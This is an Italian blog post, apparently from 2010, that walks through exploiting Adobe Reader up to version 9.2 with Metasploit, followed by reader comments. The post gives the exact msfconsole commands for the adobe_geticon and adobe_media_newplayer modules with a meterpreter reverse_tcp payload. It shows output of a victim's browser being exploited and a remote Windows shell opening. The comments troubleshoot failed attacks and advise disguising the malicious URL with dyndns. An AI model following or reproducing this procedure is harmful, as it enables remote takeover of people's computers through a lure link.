Pubblico questo exploit e la relativa guida, dopo un bel mesetto dall’uscita per evitare che qualche pirla faccia danni a qualcuno :)
Gli exploit che vedremo elencati sotto, funzionano con acrobat reader < = alla versione 9.2.
Perciò, vi consiglio di aggiornare acrobat alla versione 9.3 minimo.
Vediamo questi exploit, e come utilizzarli con metasploit :)
L’ultimo exploit uscito, per acrobat, ora parlando è questo:
Adobe Doc.media.newPlayer Use After Free Vulnerability
This module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat Professional versions up to and including 9.2.
Che funziona, anche su acrobat reader 9.2.
Questo exploit e gli altri sotto elencati, permettono di eseguire codice sulla nostra macchina da remoto.
Cosi facendo potranno installare virus a nostra insaputa, creare danni e via dicendo.
Ora per motivi di sicurezza vedremo come utilizzare un’altro exploit, questo:
Adobe Collab.getIcon() Buffer Overflow
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially crafted pdf that a contains malformed Collab.getIcon() call, an attacker may be able to execute arbitrary code.
Che come potete leggere funziona anche con abode reader 9.
Io testerò questo exploit da ubuntu verso il mio windows xp sp3 con IE 6 in macchina virtuale.
Cominciamo.
La prima cosa da fare, è aprire metasploit in console.
Se non hai installato metasploit, puoi trovare la guida su come farlo qui:
Come installare Metasploit Framework su Ubuntu 9.10 (e derivati)
Una volta installato, oppure se l’abbiamo già, la prima cosa da fare, è aggiornare gli exploit per avere quello che sfrutteremo, quindi digitiamo:
svn update
Poi apriamolo:
sudo ./msfconsole
Bene ora carichiamo l’exploit : )
Quindi digitiamo:
use exploit/windows/browser/adobe_geticon
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST NOSTRO_IP
exploit
A questo punto, avremo un output simile a questo:
msf exploit(adobe_media_newplayer) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Using URL: http://0.0.0.0:8080/4JPZe9OV
[*] Local IP: http://192.168.0.153:8080/4JPZe9OV // indirizzo da far visitare alla vittima
[*] Server started.
A questo punto, facciamo visitare questo indirizzo alla vittima :)
http://NOSTRO_IP:8080/CODE_GENERATO
Una volta che il nostro amico apre l’indirzzo, avremo questo output:
msf exploit(adobe_media_newplayer) >
[*] Sending Adobe Doc.media.newPlayer Use After Free Vulnerability to 192.168.0.153:51089...
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (192.168.0.153:4444 -> 192.168.0.153:45042)
Perfetto ora digitiamo:
sessions -i 1
e poi:
shell
ed ecco il risultato:
meterpreter > shell
Process 1904 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\clshackpc\Desktop>
Siamo dentro :)
Comunque per utilizzare il nuovo exploit per adobe, basta digitare:
use exploit/windows/browser/adobe_media_newplayer
al posto di:
use exploit/windows/browser/adobe_geticon
Ciao buon divertimento :)
Altri:
- [CVE-2010-1297]Metasploit:Flash Player 9x, 10.0 Remote code Excution
- KiTrap0D Virtual-DOS oday per metasploit :)
- Hack di WINDOWS con metasploit e IE 0day aka (Aurora) exploit
- Installare Acrobat Reader 9 su UBUNTU 9.10
- [CVE-2010-2568]Metasploit:windows Oday Remote Code Exuction
kevin81 scrive:
6 febbraio 2010 alle 21:42
non mi genera il codice
kevin81 scrive:
6 febbraio 2010 alle 21:43
scusa ma non mi genera il codice ,nel tuo caso e’ 4JPZe9OV a me invece non compare nulla
Alessio scrive:
6 febbraio 2010 alle 21:47
Scusa, è perchè sono coglione io ;)
Non dare questo comando:
set URIPATH /Altrimenti non ti genera un codice.
Quindi se hai impostato questo:
set URIPATH /Fai visitare al tuo amichetto questo indirizzo:
Local IP: http://...........:8080kevin81 scrive:
10 febbraio 2010 alle 16:29
grazie,senti ne appofitto per chiderti un altra cosa anche se non riguarda proprio questo argomento ma e’ cmq exploit:) sto provando un po di exploit ma trovo dei problemi ……ho provato a seguire i comandi da metaexploit da questo video sul tubo che ti riporto http://www.youtube.com/watch?v=9but2Io1qcc alla fine mi dice [*] Exploit completed, but no session was created.
allora,io ho un pic fisso collegato via cavo ad un modem router wriless,il pc a sopra windows 7,il portatile non e’ collegato via cavo e’ in wriless tramite il mio modem e ha windows xp home,dici che il problema puo’ essere il sistema operativo o che un pc e’ in wriless?cerco appunto di accedere al portatile dal fisso ma mi esce l’errore sopra elencato,i 2 pc si pingano a vicenda,se faccio da dos view vedo sia il mio che il portatile,altro non so grazie in anticipo e scusa il papiro ma volevo essere chiaro ^__^
clshack scrive:
10 febbraio 2010 alle 16:45
si si ho capito ;)
Comunque cosa succede ?
[*] Exploit completed, but no session was created.
Cause:
Windows non vulnerabile a questo exploit;
Hai dato il tuo ip sbagliato…
Non ho ben capito che exploit usava perchè sono dal cell e non vedo una sega cmq l’errore è che non riesce a creare la sessione quindi, il codice dell’exploit penso non venga neanche eseguito su quella macchina ;)
Beh resta aggiornato per nuove guide su metasploit :P
kevin81 scrive:
10 febbraio 2010 alle 20:54
grazie mille :)
kevin81 scrive:
10 febbraio 2010 alle 21:01
solo una cosa strana,se faccio ipconfig da dos ho indirizzo ip pero’ ce’ scritto ipv4
e non solo ip,infatti se vado nei siti dove mi danno in automatico il mio ip e’ totalmente diverso,.ho provato in 2 siti differenti e mi davano lo stesso ip diverso da quando faccio ipconfig dal mio dos,magari ho avuto problemi per questo motivo pero’ mi sembra strana come cosa
kevin81 scrive:
11 febbraio 2010 alle 03:59
scusate la confusione cercando poi su google ho capito che ho lìip privato della rete lan il tipico 192.168.1.101 e il portatile ha come finale 100 ma cmq rimango confuso,non capisco se quando lancio l’exploit sono in lan o passo da internet e se devo passare da internet per fare delle prove concrete da dove prendo lip reale delle macchine dato che come ho gia scritto sopra mi viene fuori un altro ip quando vado su siti appositi che ti danno l’ip scusate per la confusione :)
foxgen95 scrive:
8 marzo 2010 alle 00:46
scusate a me funziona tutto solamente che quando faccio aprire il link alla vittima che è un pc sulla mia lan dopo che esce sending adobe.doc il restante non mi appare e cosi non posso far partire la shell come mai?
runrain scrive:
2 maggio 2010 alle 19:05
Ciao mi chiedevo come offuscare un indirizzo ip del genere http://192.168.0.153:8080 , cioè vorrei far vedere alla persona qualcosa come un url come http://www.miosito.com ? Come potrei fare?
clshack scrive:
3 maggio 2010 alle 12:41
@runrain:
… http://www.dyndns.com/ ???
runrain scrive:
4 maggio 2010 alle 14:19
thanks :=) gran bel sito pieno di cose utili e interessanti
cesar_yasus scrive:
14 maggio 2010 alle 19:41
anche a me come a kevin81 mi viene
started reverse handler on 192.168.1.76:4444automatically detecting the target...
fingerprint:windows xp service pack 0 / 1 - lang:italian
selected target:windows xp sp0/sp1 universal
attempting to trigger the vulnerability...
sending stage (240 bytes) to 192.168.1.76
comand shell session 1 opened (192.168.1.76:4444 ---- 192.168.76:1267) at 2010-05-14 20:45:30 +0100
exploit failed: bad file descriptor
exploit completed, but no session was created.
exploit (ms08_067_natapi) >
come mai e se sapete come mai fa cosi cosa consigliate?
ciao
clshack scrive:
14 maggio 2010 alle 19:53
Ma perchè non la smettiamo di fare domande inutili ?
ms08_067_natapi => è un exploit del 2008 !!! , e poi qui stiamo parlando di acrobat .
Comunque sia non funziona perchè si sono aggiornati e l’exploit non funziona..
Consigli ?
STUDIA !
cesar_yasus scrive:
16 maggio 2010 alle 19:46
sono rimasto al punto–A questo punto, facciamo visitare questo indirizzo alla vittima
non succede propio niente …perche?
cesar_yasus scrive:
16 maggio 2010 alle 23:58
ok sono andato avanti e aprendo il link e sembra che vada tutto ok ma invece di comparire:
msf exploit(adobe_media_newplayer) >
[*] Sending Adobe Doc.media.newPlayer Use After Free Vulnerability to 192.168.0.153:51089…
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (192.168.0.153:4444 -> 192.168.0.153:45042) come nella guida
mi compare
Sending Adobe Doc.media.newPlayer Use After Free Vulnerability to 192.168.1.76:14675…e non riesco ad aprire una shell
Alex scrive:
21 maggio 2010 alle 10:48
Ma che ci fate con Metasploit se confondete un ip privato col pubblico? Studiate prima
clshack scrive:
21 maggio 2010 alle 11:46
@Alex:
io non confondo un ip pubblico con uno privato -.-’
Cacchio e qua fra un po’ chiudo i commenti tutti che chiedono “Ma come mai non funziona?” ecc ecc che nervoso, non dico di essere sapiente io, ma almeno prima di chiedere un giretto su google me lo faccio cacchio
ma cazzo aaaa